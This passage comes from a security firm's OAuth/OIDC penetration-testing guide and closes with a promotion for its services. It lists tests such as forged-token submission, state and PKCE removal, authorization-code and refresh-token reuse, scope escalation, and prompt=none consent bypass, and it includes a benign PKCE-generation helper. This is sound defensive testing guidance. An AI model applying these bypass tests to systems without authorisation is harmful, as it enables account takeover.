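Submit the forged token (and its capitalization variants) anywhere the original token was accepted; any successful response is a critical finding.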
For token storage, we inspect the browser's developer tools to determine where tokens are stored and verify the security attributes of cookies (HttpOnly, Secure, SameSite).
Phase 4: Flow Integrity Testing
We test the integrity of the OAuth flow itself:
- Remove the `state` parameter and verify the callback is rejected
- Modify the `state` parameter and verify the callback is rejected
- Remove PKCE parameters and verify the authorization request is rejected
- Test authorization code reuse (submit the same code twice)
- Test scope escalation by adding additional scopes to the authorization request
- Test the consent screen bypass with `prompt=none`
- Test the device authorization flow if available
- Test refresh token rotation by using the same refresh token twice
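Several of these checks require valid PKCE material to compare against, for example re-sending the token exchange with and without the matching verifier. A helper that generates an RFC 7636 S256 verifier/challenge pair:

```python
import base64
import hashlib
import secrets


def make_pkce_pair() -> tuple:
    """Return a (code_verifier, code_challenge) pair per RFC 7636 S256:
    the challenge is the base64url-encoded SHA-256 of the verifier."""
    verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode()
    return verifier, challenge
```

With a known-good pair in hand, a PKCE downgrade test is simply: send the authorization request without `code_challenge`, then attempt the code exchange with no `code_verifier` and confirm the server rejects it.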
Phase 5: API-Level Token Validation
At the resource server level, we verify:
- Scope enforcement on every API endpoint
- Audience validation
- Token revocation effectiveness (does the API reject tokens after a logout or password change?)
- Cross-service token replay (using a token from one service against another)
Conclusion
OAuth 2.0 and OpenID Connect are the foundation of modern authentication and authorization. When implemented correctly, they provide a secure, flexible, and user-friendly framework for delegated access. When implemented incorrectly -- which, based on our penetration testing experience, is the majority of the time -- they create vulnerabilities that directly lead to account takeover, unauthorized data access, and privilege escalation.
The core message of this guide is that OAuth security is not about following a single best practice. It is about getting every detail right simultaneously: exact redirect URI matching, mandatory PKCE, validated state parameters, proper JWT verification, secure token storage, scope enforcement at the API level, and defense-in-depth at every step. A single missed control is often all an attacker needs.
The OAuth 2.0 Security Best Current Practice (RFC 9700) consolidates years of security research into a single, actionable document. If your OAuth implementation was built before this document existed, it almost certainly has vulnerabilities that need to be addressed. If it was built after, it may still have issues if the developers did not follow every recommendation.
Automated scanning tools detect some OAuth vulnerabilities -- they can identify the use of the implicit flow, missing Referrer-Policy headers, and tokens in localStorage. But they cannot test redirect URI bypass chains, consent screen manipulation, JWT key confusion attacks, scope escalation via parameter tampering, or the many subtle interaction effects between OAuth components. These require manual penetration testing by security professionals who understand the protocol deeply.
If your application uses OAuth 2.0 or OpenID Connect -- and it almost certainly does -- a dedicated authentication and authorization security assessment is not optional. It is the minimum standard of care for protecting your users' accounts and data.
Secure Your OAuth Implementation
Lorikeet Security's web application penetration tests include deep authentication and authorization testing -- including OAuth/OIDC flow analysis, token security validation, and consent bypass testing.